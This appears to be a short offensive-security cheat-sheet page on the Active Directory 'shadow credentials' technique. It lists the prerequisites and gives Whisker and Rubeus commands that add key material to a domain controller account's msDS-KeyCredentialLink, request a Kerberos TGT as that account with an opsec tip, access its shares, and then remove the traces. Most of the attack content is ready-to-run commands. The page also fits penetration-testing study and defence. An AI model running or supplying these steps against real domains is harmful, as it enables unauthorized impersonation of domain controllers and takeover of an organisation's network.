Shadow credentials

Usually, Kerberos authentication works with username and passwords, but you can also use private and public keys. If you are able to write to an object's msDS-KeyCredentialLink attribute, you are able to request TGTs for that object.

Requirements:

Ability to write to msDS-KeyCredentialLink of an object
Domain must have ADCS and a CA configured
Domain requires a DC Server 2016 that supports PKINIT

powershell

# List keys from target object where we can write to msDS-KeyCredentialLink, e.g. dc01$ in this case
Whisker.exe list /target:\"dc01$\"

# Add new key material to the DC01$ account, Whisker will spit out a Rubeus command
Whisker.exe add /target:\"dc01$\"

# Ask for TGT, add /enctype:aes256 for better opsec
Rubeus.exe asktgt /user:\"dc01$\" /certificate:\"CERT\" /password:\"password\" /nowrap /enctype:aes256

# Now we are able to access the shares on the target computer

# Remove abused key material (+ restore original content)
Whisker.exe remove /target:\"dc01$\" /deviceid:\"device_id\"

Kerberos delegation

Basic knowledge

Misconfigurations

Shadow credentials

Shadow credentials ​

Shadow credentials